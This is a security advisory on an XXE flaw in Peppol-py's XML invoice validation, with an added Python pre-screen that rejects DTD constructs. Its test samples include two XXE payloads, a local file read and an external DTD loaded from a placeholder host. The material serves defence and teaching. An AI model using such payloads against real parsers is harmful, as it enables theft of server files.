Peppol-py XXE Vulnerability in XML Invoice Validation
Vulnerability
Peppol-py versions prior to 1.1.1 are vulnerable to XML External Entity (XXE) injection. The issue arises from the default configuration of the Saxon XML processor, which permits access to external resources. When an XML-based invoice is validated, a crafted document can make the parser read files from the server's filesystem and send their contents to a remote host.
Impact
An attacker who can submit an invoice for validation can read local files on the server and potentially send their contents to an external location.
Remediation
Upgrade to Peppol-py version 1.1.1 or later, where this vulnerability has been fixed.
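The root cause described above is an XML processor that honours DTD constructs (DOCTYPE, entity declarations, external entity references) in documents that never legitimately need them; e-invoice schemas such as UBL carry no DTD. The following is an added example, not Peppol-py code and not the 1.1.1 fix: a standard-library pre-screen that rejects any such construct before the document reaches the schema validator, whatever engine (Saxon or otherwise) runs afterwards. The invoice samples are constructed; the UBL namespace URIs are the standard ones, the file path and hostname in the rejected samples are placeholders.

```python
"""Defensive pre-screen for XML e-invoices against XXE (added example, not Peppol-py code).

Electronic-invoice formats such as UBL never carry a DTD, so any DOCTYPE, entity
declaration or external entity reference in an incoming document is rejected
before the document is handed to a schema validator. Standard library only.
"""
from xml.parsers import expat
import xml.etree.ElementTree as ET

# Standard UBL 2 namespaces, used only to read the invoice identifier.
UBL_INVOICE_NS = "urn:oasis:names:specification:ubl:schema:xsd:Invoice-2"
CBC_NS = "urn:oasis:names:specification:ubl:schema:xsd:CommonBasicComponents-2"


class UnsafeXmlError(ValueError):
    """Raised when a document uses XML features that enable XXE."""


def screen_for_xxe(xml_bytes: bytes) -> None:
    """Raise UnsafeXmlError on the first DTD-related construct; return None if clean.

    expat is driven with handlers that abort on a DOCTYPE, on any entity
    declaration and on any external entity reference. An exception raised
    inside an expat handler propagates out of Parse(), so parsing stops at
    the first hit and nothing external is ever fetched.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError(f"DOCTYPE not allowed (root={name!r}, system_id={sysid!r})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        raise UnsafeXmlError(f"{kind} entity {name!r} declared (system_id={sysid!r})")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXmlError(f"external entity reference to {sysid!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)  # raises expat.ExpatError on malformed XML


def is_safe_invoice(xml_bytes: bytes) -> bool:
    """True if the document passes the XXE screen, False if it is rejected or malformed."""
    try:
        screen_for_xxe(xml_bytes)
    except (UnsafeXmlError, expat.ExpatError):
        return False
    return True


def parse_invoice(xml_bytes: bytes) -> dict:
    """Screen the document, then parse it and return the invoice identifier."""
    screen_for_xxe(xml_bytes)
    root = ET.fromstring(xml_bytes)
    if root.tag != f"{{{UBL_INVOICE_NS}}}Invoice":
        raise ValueError(f"unexpected root element {root.tag!r}")
    id_elem = root.find(f"{{{CBC_NS}}}ID")
    if id_elem is None or not id_elem.text:
        raise ValueError("invoice has no cbc:ID")
    return {"invoice_id": id_elem.text.strip()}


# Constructed sample: a minimal, benign UBL invoice.
BENIGN_INVOICE = b"""<?xml version="1.0" encoding="UTF-8"?>
<Invoice xmlns="urn:oasis:names:specification:ubl:schema:xsd:Invoice-2"
         xmlns:cbc="urn:oasis:names:specification:ubl:schema:xsd:CommonBasicComponents-2">
  <cbc:ID>INV-2024-001</cbc:ID>
</Invoice>"""

# Constructed sample: the in-band shape the advisory describes, an external
# entity that points at a local file. The path is a placeholder.
XXE_FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE Invoice [ <!ENTITY xxe SYSTEM "file:///placeholder/local/file"> ]>
<Invoice xmlns="urn:oasis:names:specification:ubl:schema:xsd:Invoice-2"
         xmlns:cbc="urn:oasis:names:specification:ubl:schema:xsd:CommonBasicComponents-2">
  <cbc:ID>&xxe;</cbc:ID>
</Invoice>"""

# Constructed sample: a parameter entity loading an external DTD, the shape
# behind "send their contents to a remote host". The host is a placeholder.
XXE_EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE Invoice [ <!ENTITY % ext SYSTEM "http://placeholder.invalid/x.dtd"> %ext; ]>
<Invoice xmlns="urn:oasis:names:specification:ubl:schema:xsd:Invoice-2"
         xmlns:cbc="urn:oasis:names:specification:ubl:schema:xsd:CommonBasicComponents-2">
  <cbc:ID>INV-2024-002</cbc:ID>
</Invoice>"""


if __name__ == "__main__":
    print("accepted:", parse_invoice(BENIGN_INVOICE))
    for sample in (XXE_FILE_READ, XXE_EXTERNAL_DTD):
        try:
            parse_invoice(sample)
        except UnsafeXmlError as exc:
            print("rejected:", exc)
```

Rejecting on the DOCTYPE itself, rather than only on external entities, is deliberate: it also stops entity-expansion denial of service and internal-subset tricks, and a legitimate Peppol invoice is never affected because the format does not use DTDs. The screen complements, rather than replaces, configuring the downstream processor to deny external resource access.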
